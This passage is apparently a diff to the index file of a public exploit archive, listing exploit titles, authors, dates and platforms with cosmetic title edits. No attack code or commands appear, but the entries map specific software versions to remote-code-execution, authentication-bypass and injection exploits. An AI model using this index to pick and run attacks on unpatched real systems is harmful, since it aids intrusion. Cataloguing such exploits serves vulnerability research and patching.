Disclosure",2003-06-02,"Rynho Zeros Web",php,webapps,0 22705,platforms/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 - Expanded.php Directory Traversal",2003-06-02,_6mO_HaCk,php,webapps,0 -22706,platforms/windows/dos/22706.asm,"Crob FTP Server 2.50.4 - Remote Username Format String",2003-06-02,"Luca Ercoli",windows,dos,0 +22706,platforms/windows/dos/22706.asm,"Crob FTP Server 2.50.4 - Remote 'Username' Format String",2003-06-02,"Luca Ercoli",windows,dos,0 22707,platforms/windows/dos/22707.txt,"Novell Groupwise Internet Agent - LDAP BIND Request Overflow",2012-11-14,"Francis Provencher",windows,dos,0 22708,platforms/php/webapps/22708.txt,"dotProject 2.1.6 - Remote File Inclusion",2012-11-14,dun,php,webapps,0 22709,platforms/php/webapps/22709.txt,"Narcissus - Remote Command Execution",2012-11-14,dun,php,webapps,0 @@ -19959,7 +19960,7 @@ id,file,description,date,author,platform,type,port 22711,platforms/php/webapps/22711.txt,"Myrephp Business Directory - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22712,platforms/php/webapps/22712.txt,"MYREphp Vacation Rental Software - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22714,platforms/windows/remote/22714.rb,"Oracle Database Client System Analyzer - Arbitrary File Upload",2012-11-15,Metasploit,windows,remote,0 -22715,platforms/php/webapps/22715.txt,"WebChat 2.0 - users.php Database Username Disclosure",2003-06-02,"Rynho Zeros Web",php,webapps,0 +22715,platforms/php/webapps/22715.txt,"WebChat 2.0 - users.php Database 'Username' Disclosure",2003-06-02,"Rynho Zeros Web",php,webapps,0 22716,platforms/php/webapps/22716.txt,"WebChat 2.0 - users.php Cross-Site Scripting",2003-06-02,"Rynho Zeros Web",php,webapps,0 22717,platforms/php/webapps/22717.txt,"SPChat 0.8 Module - Remote File Inclusion",2003-06-02,"Rynho Zeros Web",php,webapps,0 22718,platforms/windows/dos/22718.c,"Pi3Web 2.0.2 - SortName Buffer Overflow",2003-06-02,posidron,windows,dos,0 @@ -19988,7 +19989,7 @@ id,file,description,date,author,platform,type,port 22742,platforms/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,"cr4wl3r ",php,webapps,0 22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - Admin.cgi Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0 22744,platforms/asp/webapps/22744.txt,"Synkron.Web 3.0 - HTML Injection",2003-06-06,Gyrniff,asp,webapps,0 -22745,platforms/linux/local/22745.c,"Zblast 1.2 - Local Username Buffer Overrun",2003-06-06,V9,linux,local,0 +22745,platforms/linux/local/22745.c,"Zblast 1.2 - Local 'Username' Buffer Overrun",2003-06-06,V9,linux,local,0 22746,platforms/asp/webapps/22746.txt,"Maxwebportal 1.30 - search.asp Search Parameter Cross-Site Scripting",2003-06-06,JeiAr,asp,webapps,0 22747,platforms/asp/webapps/22747.txt,"Maxwebportal 1.30 - Remote Database Disclosure",2003-06-06,JeiAr,asp,webapps,0 22748,platforms/linux/local/22748.c,"Xaos 3.0 - Language Option Local Buffer Overflow",2003-06-06,bazarr@ziplip.com,linux,local,0 @@ -20022,14 +20023,14 @@ id,file,description,date,author,platform,type,port 22778,platforms/asp/webapps/22778.txt,"Snitz Forums 2000 3.4.03 - search.asp Cross-Site Scripting",2003-06-16,JeiAr,asp,webapps,0 22779,platforms/windows/local/22779.pl,"Mailtraq 2.1.0.1302 - User Password Encoding",2003-06-16,"Noam Rathaus",windows,local,0 22780,platforms/windows/dos/22780.txt,"Mailtraq 2.1.0.1302 - Remote Format String SMTP Resource Consumption",2003-06-16,"Noam Rathaus",windows,dos,0 -22781,platforms/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module getlogin() Username Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",linux,local,0 +22781,platforms/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module getlogin() 'Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",linux,local,0 22782,platforms/windows/remote/22782.py,"Microsoft Windows 2000 - Active Directory Remote Stack Overflow",2003-07-02,"Core Security",windows,remote,0 22783,platforms/windows/remote/22783.txt,"Microsoft Internet Explorer 5/6 - MSXML XML File Parsing Cross-Site Scripting",2003-06-17,"GreyMagic Software",windows,remote,0 22784,platforms/windows/remote/22784.txt,"Microsoft Internet Explorer 5 - Custom HTTP Error HTML Injection",2003-06-17,"GreyMagic Software",windows,remote,0 22785,platforms/windows/remote/22785.txt,"MyServer 0.4.1/0.4.2 - HTTP Server Directory Traversal",2003-06-17,"Ziv Kamir",windows,remote,0 22786,platforms/linux/remote/22786.c,"Dune 0.6.7 - HTTP Get Remote Buffer Overrun",2003-06-17,V9,linux,remote,0 -22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record - File Upload Remote Code Execution",2012-11-19,Metasploit,windows,remote,0 -22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote Username Buffer Overrun",2003-03-30,dr_insane,windows,dos,0 +22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record - Arbitrary File Upload Remote Code Execution",2012-11-19,Metasploit,windows,remote,0 +22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote 'Username' Buffer Overrun",2003-03-30,dr_insane,windows,dos,0 22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0 22790,platforms/windows/dos/22790.txt,"GuildFTPd 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0 22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 - move_messages.php Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 @@ -20168,7 +20169,7 @@ id,file,description,date,author,platform,type,port 22951,platforms/windows/remote/22951.html,"Opera 7.20 - Mail Client Policy Circumvention",2003-07-23,"Arve Bersvendsen",windows,remote,0 22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 - Unspecified Memory Disclosure",2003-07-23,V9,linux,dos,0 22953,platforms/php/webapps/22953.txt,"PHP-Gastebuch 1.60 - Information Disclosure",2003-07-24,"Jim Pangalos",php,webapps,0 -22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload And Execution",2003-07-24,"Martin Eiszner",php,webapps,0 +22955,platforms/php/webapps/22955.html,"PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 - Arbitrary File Upload and Execution",2003-07-24,"Martin Eiszner",php,webapps,0 22956,platforms/php/webapps/22956.txt,"e107 Website System 0.555 - db.php Information Disclosure",2003-07-24,"Artoor Petrovich",php,webapps,0 22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service",2003-07-23,refdom,windows,dos,0 22958,platforms/php/webapps/22958.txt,"e107 Website System 0.554 - HTML Injection",2003-07-25,"Pete Foster",php,webapps,0 @@ -20196,7 +20197,7 @@ id,file,description,date,author,platform,type,port 22928,platforms/linux/local/22928.pl,"mcrypt 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,linux,local,0 22929,platforms/php/webapps/22929.txt,"BuyClassifiedScript - PHP Code Injection",2012-11-26,d3b4g,php,webapps,0 22931,platforms/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional - (Direct Retn) Exploit",2012-11-26,Nezim,windows,local,0 -22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - (Direct Retn)",2012-11-26,Nezim,windows,local,0 +22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - (Direct Retn) Exploit",2012-11-26,Nezim,windows,local,0 22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x - Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",php,webapps,0 23006,platforms/php/remote/23006.rb,"Network Shutdown Module 3.21 - (sort_values) Remote PHP Code Injection",2012-11-29,Metasploit,php,remote,0 23007,platforms/windows/local/23007.rb,"Microsoft Windows - AlwaysInstallElevated MSI",2012-11-29,Metasploit,windows,local,0 @@ -20226,7 +20227,7 @@ id,file,description,date,author,platform,type,port 22976,platforms/freebsd/remote/22976.pl,"FreeBSD 4.8 - realpath() Off-by-One Buffer Overflow",2003-07-31,daniels@legend.co.uk,freebsd,remote,0 22977,platforms/php/webapps/22977.txt,"MOD Guthabenhack 1.3 For Woltlab Burning Board - SQL Injection",2003-07-31,ben.moeckel@badwebmasters.net,php,webapps,0 22978,platforms/hardware/dos/22978.txt,"Cisco IOS 10/11/12 - UDP Echo Service Memory Disclosure",2003-08-01,FX,hardware,dos,0 -22979,platforms/linux/local/22979.txt,"CDRTools 2.0 - RSCSI Debug File Arbitrary Local File manipulation",2003-08-01,"Secure Network Operations",linux,local,0 +22979,platforms/linux/local/22979.txt,"CDRTools 2.0 - RSCSI Debug File Arbitrary Local File Manipulation",2003-08-01,"Secure Network Operations",linux,local,0 22980,platforms/windows/local/22980.asm,"Symantec Norton AntiVirus 2002/2003 - Device Driver Memory Overwrite",2003-08-02,"Lord Yup",windows,local,0 22981,platforms/linux/dos/22981.c,"Postfix 1.1.x - Denial of Service (1)",2003-08-04,r3b00t,linux,dos,0 22982,platforms/linux/dos/22982.pl,"Postfix 1.1.x - Denial of Service (2)",2003-08-04,daniels@legend.co.uk,linux,dos,0 @@ -20251,7 +20252,7 @@ id,file,description,date,author,platform,type,port 23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 - admin.php Cross-Site Scripting",2003-08-09,"Boy Bear",php,webapps,0 23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 - Null Password Authentication",2003-08-09,"Buckaroo Banzai",windows,remote,0 23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple Cross-Site Scripting POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0 -23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0 +23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - Arbitrary File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0 23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module - PDA_limit Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 - Full Path Disclosure",2003-08-11,"Zone-h Security Team",php,webapps,0 23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking",2003-08-11,root@networkpenetration.com,windows,remote,0 @@ -20303,14 +20304,14 @@ id,file,description,date,author,platform,type,port 23070,platforms/multiple/remote/23070.txt,"sap internet transaction server 4620.2.0.323011 build 46b.323011 - Directory Traversal",2003-08-30,"Martin Eiszner",multiple,remote,0 23071,platforms/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Cross-Site Scripting",2003-08-30,"Martin Eiszner",multiple,remote,0 23072,platforms/php/webapps/23072.txt,"Ezboard - 'invitefriends.php3' Cross-Site Scripting",2003-09-01,"David F. Madrid",php,webapps,0 -23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 - 'MySQLJackpot' Windows Remote Root",2012-12-02,kingcope,windows,remote,0 +23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit",2012-12-02,kingcope,windows,remote,0 23074,platforms/windows/remote/23074.txt,"IBM System Director - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0 23075,platforms/linux/dos/23075.pl,"MySQL (Linux) - Stack Based Buffer Overrun (PoC)",2012-12-02,kingcope,linux,dos,0 23076,platforms/linux/dos/23076.pl,"MySQL (Linux) - Heap Based Overrun (PoC)",2012-12-02,kingcope,linux,dos,0 23077,platforms/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Elevation Exploit",2012-12-02,kingcope,linux,local,0 23078,platforms/linux/dos/23078.txt,"MySQL - Denial of Service (PoC)",2012-12-02,kingcope,linux,dos,0 -23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass Exploit",2012-12-02,kingcope,windows,remote,0 -23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass Exploit",2012-12-02,kingcope,windows,remote,0 +23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0 +23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0 23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Pre-Authentication User Enumeration",2012-12-02,kingcope,multiple,remote,0 23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0 23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0 @@ -20662,19 +20663,19 @@ id,file,description,date,author,platform,type,port 23439,platforms/multiple/remote/23439.txt,"MVDSV 0.165 b/0.171 Quake Server - Download Buffer Overrun",2003-12-15,"Oscar Linderholm",multiple,remote,0 23440,platforms/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0 23441,platforms/linux/remote/23441.c,"Cyrus IMSP Daemon 1.x - Remote Buffer Overflow",2003-12-15,"Carlos Barros",linux,remote,0 -23442,platforms/osx/dos/23442.txt,"Apple Mac OS X 10 - CD9660.Util Probe For Mounting Argument Local Buffer Overflow",2003-12-15,Max,osx,dos,0 +23442,platforms/osx/dos/23442.txt,"Apple Mac OSX 10 - CD9660.Util Probe For Mounting Argument Local Buffer Overflow",2003-12-15,Max,osx,dos,0 23443,platforms/php/webapps/23443.txt,"Aardvark Topsites 4.1 PHP - Multiple Vulnerabilities",2003-12-16,JeiAr,php,webapps,0 23444,platforms/multiple/dos/23444.pl,"SX Design sipd 0.1.2/0.1.4 - Remote Format String",2003-12-16,storm,multiple,dos,0 23445,platforms/php/webapps/23445.txt,"osCommerce 2.2 - osCsid Parameter Cross-Site Scripting",2003-12-17,JeiAr,php,webapps,0 23446,platforms/windows/remote/23446.txt,"GoAhead WebServer 2.1.x - ASP Script File Source Code Disclosure",2002-12-17,"Luigi Auriemma",windows,remote,0 23447,platforms/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution",2003-12-18,"Paul Craig",cgi,webapps,0 23448,platforms/php/webapps/23448.php,"phpwcms 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 -23453,platforms/php/webapps/23453.txt,"BES-CMS 0.4/0.5 - index.inc.php File Include",2003-12-20,frog,php,webapps,0 -23454,platforms/php/webapps/23454.txt,"BES-CMS 0.4/0.5 - members/index.inc.php File Include",2003-12-20,frog,php,webapps,0 -23455,platforms/php/webapps/23455.txt,"BES-CMS 0.4/0.5 - message.php File Include",2003-12-20,frog,php,webapps,0 -23456,platforms/php/webapps/23456.txt,"BES-CMS 0.4/0.5 - start.php File Include",2003-12-20,frog,php,webapps,0 -23457,platforms/php/webapps/23457.txt,"BES-CMS 0.4/0.5 - folder.php File Include",2003-12-20,frog,php,webapps,0 -23458,platforms/php/webapps/23458.txt,"BES-CMS 0.4/0.5 - hacking.php File Include",2003-12-20,frog,php,webapps,0 +23453,platforms/php/webapps/23453.txt,"BES-CMS 0.4/0.5 - index.inc.php File Inclusion",2003-12-20,frog,php,webapps,0 +23454,platforms/php/webapps/23454.txt,"BES-CMS 0.4/0.5 - members/index.inc.php File Inclusion",2003-12-20,frog,php,webapps,0 +23455,platforms/php/webapps/23455.txt,"BES-CMS 0.4/0.5 - message.php File Inclusion",2003-12-20,frog,php,webapps,0 +23456,platforms/php/webapps/23456.txt,"BES-CMS 0.4/0.5 - start.php File Inclusion",2003-12-20,frog,php,webapps,0 +23457,platforms/php/webapps/23457.txt,"BES-CMS 0.4/0.5 - folder.php File Inclusion",2003-12-20,frog,php,webapps,0 +23458,platforms/php/webapps/23458.txt,"BES-CMS 0.4/0.5 - hacking.php File Inclusion",2003-12-20,frog,php,webapps,0 23459,platforms/php/webapps/23459.txt,"Xoops 2.0.5.1 - MyLinks Myheader.php Cross-Site Scripting",2003-12-21,"Chintan Trivedi",php,webapps,0 23460,platforms/php/dos/23460.pl,"ProjectForum 8.4.2.1 - Find Request Denial of Service",2003-12-22,"Peter Winter-Smith",php,dos,0 23461,platforms/windows/remote/23461.txt,"dcam webcam server personal Web server 8.2.5 - Directory Traversal",2003-12-22,"Luigi Auriemma",windows,remote,0 @@ -20707,9 +20708,9 @@ id,file,description,date,author,platform,type,port 23488,platforms/cgi/webapps/23488.txt,"BulletScript MailList - bsml.pl Information Disclosure",2003-12-29,M0rf,cgi,webapps,0 23489,platforms/windows/remote/23489.txt,"Sygate Personal Firewall 5.0 - DLL Authentication Bypass",2003-12-29,Aphex,windows,remote,0 23490,platforms/windows/remote/23490.txt,"Microsoft IIS 5.0 - Failure To Log Undocumented TRACK Requests",2003-12-29,"Parcifal Aertssen",windows,remote,0 -23491,platforms/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - Username Stack Based Buffer Overrun (1)",2003-12-29,fiNis,windows,remote,0 -23492,platforms/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - Username Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,windows,remote,0 -23493,platforms/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - Username Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",windows,remote,0 +23491,platforms/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1)",2003-12-29,fiNis,windows,remote,0 +23492,platforms/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,windows,remote,0 +23493,platforms/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",windows,remote,0 23494,platforms/php/webapps/23494.txt,"Clockstone and other CMSMasters Theme - Arbitrary File Upload",2012-12-19,DigiP,php,webapps,0 23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 - File Disclosure",2004-01-31,"Zero X",php,webapps,0 23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",windows,dos,0 @@ -20723,9 +20724,9 @@ id,file,description,date,author,platform,type,port 23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",windows,remote,0 23503,platforms/windows/remote/23503.txt,"NETObserve 2.0 - Authentication Bypass",2003-12-29,"Peter Winter-Smith",windows,remote,0 23504,platforms/windows/dos/23504.txt,"Microsoft Windows XP/2000 - showHelp CHM File Execution",2003-12-30,"Arman Nayyeri",windows,dos,0 -23505,platforms/osx/dos/23505.c,"Apple Mac OS X 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos,0 +23505,platforms/osx/dos/23505.c,"Apple Mac OSX 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos,0 23506,platforms/windows/dos/23506.txt,"GoodTech Telnet Server 4.0 - Remote Denial of Service",2004-01-02,"Donato Ferrante",windows,dos,0 -23507,platforms/php/webapps/23507.txt,"EasyDynamicPages 1.0 - config_page.php Remote PHP File Include",2004-01-02,tsbeginnervn,php,webapps,0 +23507,platforms/php/webapps/23507.txt,"EasyDynamicPages 1.0 - config_page.php Remote PHP File Inclusion",2004-01-02,tsbeginnervn,php,webapps,0 23508,platforms/hardware/dos/23508.txt,"YaSoft Switch Off 2.3 - Large Packet Remote Denial of Service",2004-01-02,"Peter Winter-Smith",hardware,dos,0 23509,platforms/windows/remote/23509.c,"YaSoft Switch Off 2.3 - swnet.dll Remote Buffer Overflow",2004-01-02,MrNice,windows,remote,0 23510,platforms/linux/local/23510.c,"XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0 @@ -20742,7 +20743,7 @@ id,file,description,date,author,platform,type,port 23691,platforms/php/webapps/23691.txt,"vBulletin 3.0 - search.php Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 - Invalid Command Argument Local Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0 23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP - Authenticated Admin Command Injection (Metasploit)",2012-12-20,"Spencer McIntyre",multiple,remote,0 -23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) 7.5.1 - NULL Pointer Dereference",2012-12-20,nitr0us,linux,dos,0 +23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) 7.5.1 - Null Pointer Dereference",2012-12-20,nitr0us,linux,dos,0 23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 - Crash (PoC)",2012-12-20,nitr0us,multiple,dos,0 23525,platforms/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting",2004-01-06,Windak,php,webapps,0 23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 - PHPInfo Information Disclosure",2004-01-06,Windak,php,webapps,0 @@ -20750,7 +20751,7 @@ id,file,description,date,author,platform,type,port 23528,platforms/hardware/remote/23528.txt,"Edimax AR-6004 ADSL Router - Management Interface Cross-Site Scripting",2004-01-06,"Rafel Ivgi",hardware,remote,0 23529,platforms/windows/remote/23529.txt,"SnapStream PVS Lite 2.0 - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",windows,remote,0 23530,platforms/windows/dos/23530.c,"Kroum Grigorov KpyM Telnet Server 1.0 - Remote Denial of Service",2004-01-07,NoRpiuS,windows,dos,0 -23531,platforms/windows/remote/23531.c,"HD Soft Windows FTP Server 1.5/1.6 - Username Format String",2004-01-12,mandragore,windows,remote,0 +23531,platforms/windows/remote/23531.c,"HD Soft Windows FTP Server 1.5/1.6 - 'Username' Format String",2004-01-12,mandragore,windows,remote,0 23532,platforms/windows/remote/23532.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb Directory Traversal",2004-01-09,badpack3t,windows,remote,0 23533,platforms/windows/remote/23533.txt,"Accipiter DirectServer 6.0 - Remote File Disclosure",2004-01-09,"Mark Bassett",windows,remote,0 23534,platforms/windows/dos/23534.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb CreateFile Function Denial of Service",2004-01-09,badpack3t,windows,dos,0 @@ -20791,7 +20792,7 @@ id,file,description,date,author,platform,type,port 23571,platforms/asp/webapps/23571.txt,"SelectSurvey CMS - 'ASP.NET' Arbitrary File Upload",2012-12-21,040,asp,webapps,0 23572,platforms/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP firmware 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps,0 23573,platforms/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 -23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - NULL Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 +23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - Null Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 - Multiple SQL Injections",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23878,platforms/windows/remote/23878.txt,"HP Web Jetadmin 7.5.2456 - Printer Firmware Update Script Arbitrary File Upload",2004-03-24,wirepair,windows,remote,0 23877,platforms/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x - Directory Traversal",2004-03-24,"Ziv Kamir",windows,remote,0 @@ -20799,7 +20800,7 @@ id,file,description,date,author,platform,type,port 23580,platforms/unix/remote/23580.rb,"Foswiki MAKETEXT - Remote Command Execution",2012-12-23,Metasploit,unix,remote,0 23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl Module - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0 23582,platforms/cgi/remote/23582.txt,"Acme thttpd 1.9/2.0.x - CGI Test Script Cross-Site Scripting",2004-01-22,"Rafel Ivgi The-Insider",cgi,remote,0 -23583,platforms/multiple/remote/23583.txt,"Netbus 2.0 Pro - Directory Listings Disclosure / File Upload",2004-01-22,"Rafel Ivgi The-Insider",multiple,remote,0 +23583,platforms/multiple/remote/23583.txt,"Netbus 2.0 Pro - Directory Listings Disclosure / Arbitrary File Upload",2004-01-22,"Rafel Ivgi The-Insider",multiple,remote,0 23584,platforms/windows/dos/23584.c,"McAfee ePolicy Orchestrator 1.x/2.x/3.0 - Agent HTTP POST Buffer Mismanagement",2004-01-22,cyber_flash,windows,dos,0 23585,platforms/linux/remote/23585.txt,"Finjan SurfinGate 6.0/7.0 - FHTTP Restart Command Execution",2004-01-23,"David Byrne",linux,remote,0 23586,platforms/netware/remote/23586.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - env.bas Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 @@ -20913,8 +20914,8 @@ id,file,description,date,author,platform,type,port 23705,platforms/cgi/webapps/23705.txt,"ShopCartCGI 2.3 - gotopage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 23706,platforms/cgi/webapps/23706.txt,"ShopCartCGI 2.3 - genindexpage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 23707,platforms/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",multiple,remote,0 -23708,platforms/windows/dos/23708.c,"RobotFTP Server 1.0/2.0 - Username Buffer Overflow (1)",2004-02-16,gsicht,windows,dos,0 -23709,platforms/windows/dos/23709.c,"RobotFTP Server 1.0/2.0 - Username Buffer Overflow (2)",2004-02-16,NoRpiuS,windows,dos,0 +23708,platforms/windows/dos/23708.c,"RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (1)",2004-02-16,gsicht,windows,dos,0 +23709,platforms/windows/dos/23709.c,"RobotFTP Server 1.0/2.0 - 'Username' Buffer Overflow (2)",2004-02-16,NoRpiuS,windows,dos,0 23710,platforms/php/webapps/23710.txt,"YABB SE 1.5 - Quote Parameter SQL Injection",2004-02-16,BaCkSpAcE,php,webapps,0 23711,platforms/php/webapps/23711.txt,"eCommerce Corporation Online Store Kit 3.0 - More.php id Parameter SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps,0 23712,platforms/php/webapps/23712.txt,"eCommerce Corporation Online Store Kit 3.0 - More.php Cross-Site Scripting",2003-02-17,"David Sopas Ferreira",php,webapps,0 @@ -21066,7 +21067,7 @@ id,file,description,date,author,platform,type,port 23860,platforms/asp/webapps/23860.txt,"Expinion.net News Manager Lite 2.5 - more.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23861,platforms/asp/webapps/23861.txt,"Expinion.net News Manager Lite 2.5 - category_news.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23862,platforms/asp/webapps/23862.txt,"Expinion.net News Manager Lite 2.5 - news_sort.asp filter Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 -23863,platforms/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 - NEWS_LOGIN Cookie Admin Parameter manipulation Admin Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps,0 +23863,platforms/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 - NEWS_LOGIN Cookie Admin Parameter Manipulation Admin Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps,0 23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal",2004-03-22,"Donato Ferrante",linux,remote,0 23865,platforms/php/webapps/23865.txt,"vBulletin 2.x - private.php Cross-Site Scripting",2004-03-22,JeiAr,php,webapps,0 23866,platforms/php/webapps/23866.txt,"phpBB 1.x/2.0.x - Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps,0 @@ -21219,7 +21220,7 @@ id,file,description,date,author,platform,type,port 24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer - ActiveX Remote Code Execution",2013-01-10,Metasploit,windows,remote,0 24022,platforms/windows/dos/24022.txt,"Nero MediaHome 4.5.8.0 - Denial of Service",2013-01-10,"High-Tech Bridge SA",windows,dos,0 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0 -24024,platforms/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Remote File Upload And Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 +24024,platforms/windows/remote/24024.html,"Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload and Execution",2004-04-19,"Rafel 